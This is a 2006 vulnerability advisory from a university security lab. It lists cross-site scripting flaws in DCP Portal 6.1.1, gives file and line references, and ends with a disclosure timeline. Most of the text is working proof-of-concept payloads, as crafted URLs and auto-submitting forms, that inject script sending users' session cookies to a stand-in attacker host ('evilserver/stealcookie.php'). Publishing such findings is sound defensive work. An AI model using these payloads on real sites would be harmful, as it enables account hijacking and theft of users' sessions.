DCP Portal (www.dcp-portal.com)
Versions 6.1.1 and prior.
There are multiple cross-site scripting (XSS) vulnerabilities which can be verified by using the following
exploits (the user needs to be logged in). They are roughly sorted by entry points (i.e., the names of the
files that have to be navigated).The vulnerabilities were discovered under the assumption that
register_globals is on, and that magic_quotes_gpc is off.
index.php, 380:
http://localhost/dcp-portal611/index.php?page=documents&dl=xyz&its_url=xyz.html"><script
type="text/javascript">document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>
index.php, 690:
http://localhost/dcp-portal611/index.php?page=send_write&url=xyz.html"><script
type="text/javascript">document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>
55: like 52
62:
77:
<form
action='http://localhost/dcp-portal611/calendar.php?show=full_month&month=02&day="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>'
method="post">
<input type="text" name="year" value='2006' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
86:
using $_REQUEST['year'], 'month' or 'day':
92: analogous to lines 52 und 55 ($images)
149: $_REQUEST['year'] again
151: $_REQUEST['year'] again
between lines 199 and 219: $_REQUEST[*] again (nine times)
223:
echoing the value returned by function PrintCalendar (composes its
return value from $_REQUEST[*])
255: repeat
230: $subject_color, like 52
255: $_REQUEST['year']
257: $_REQUEST['year']
261: $_REQUEST['day']
95:
<form action='http://localhost/dcp-portal611/forums.php?action=board&bid=1' method="post">
<input type="text" name="bid"
value='"></a><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
140:
194:
<form action='http://localhost/dcp-portal611/forums.php?action=addtopic&bid=1' method="post">
<input type="text" name="subject"
value='"><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
198:
<form action='http://localhost/dcp-portal611/forums.php?action=addtopic&bid=1' method="post">
<input type="text" name="body"
value='"></textarea><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>'
/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
207:
231:
<form action='http://localhost/dcp-portal611/forums.php?action=savemsg' method="post">
<input type="text" name="bid"
value='"><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
127:
<form action='http://localhost/dcp-portal611/inbox.php?action=send' method="post">
<input type="text" name="subject"
value='"><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>' />
<input type="text" name="message" value='' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
133:
<form action='http://localhost/dcp-portal611/inbox.php?action=send' method="post">
<input type="text" name="message"
value='"></textarea><script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>'
/>
<input type="text" name="subject" value='' />
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
353:
<form
action='http://localhost/dcp-portal611/inbox.php?action=delete&subject="><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>'
method="post">
<input type="submit" name="submit" value='Reply'>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
automatic submission via JavaScript does not work here
359: analogous to 353
<form
action='http://localhost/dcp-portal611/inbox.php?action=delete&message="></textarea><script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>'
method="post">
<input type="submit" name="submit" value='Reply'>
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
222: $content_inicial again
248: $c_name again
315:
326: $content_inicial again
362: $c_name again
404: $action_submit, via $cid (analogous to 315)
414: $content_inicial again
444: $c_name again
81:
<form
action='http://localhost/dcp-portal611/search.php?field=<script>document.location="http://evilserver/stealcookie.php?"%2bdocument.cookie</script>'
method="post">
<input type="text" name="q" value="xyz"/>
<input type="text" name="query" value="true"/>
<input type="text" name="return" value="tid, title, body"/>
<input type="text" name="table" value="dcp5_forum_messages"/>
<input type="text" name="id_col" value="tid"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
81:
<form action='http://localhost/dcp-portal611/search.php' method="post">
<input type="text" name="q"
value='<script>document.location="http://evilserver/stealcookie.php?"+document.cookie</script>
method="post">'/>
<input type="text" name="query" value="true"/>
<input type="text" name="return" value="tid, title, body"/>
<input type="text" name="table" value="dcp5_forum_messages"/>
<input type="text" name="id_col" value="tid"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
The authors have not responded to our messages, so there is no solution to these issues yet.
Timeline:
February 19, 2006:
Vulnerabilities indicated via andy at codeworx dot ca, but no response.
March 9, 2006:
Advisory submission.
http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-001.txt
Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at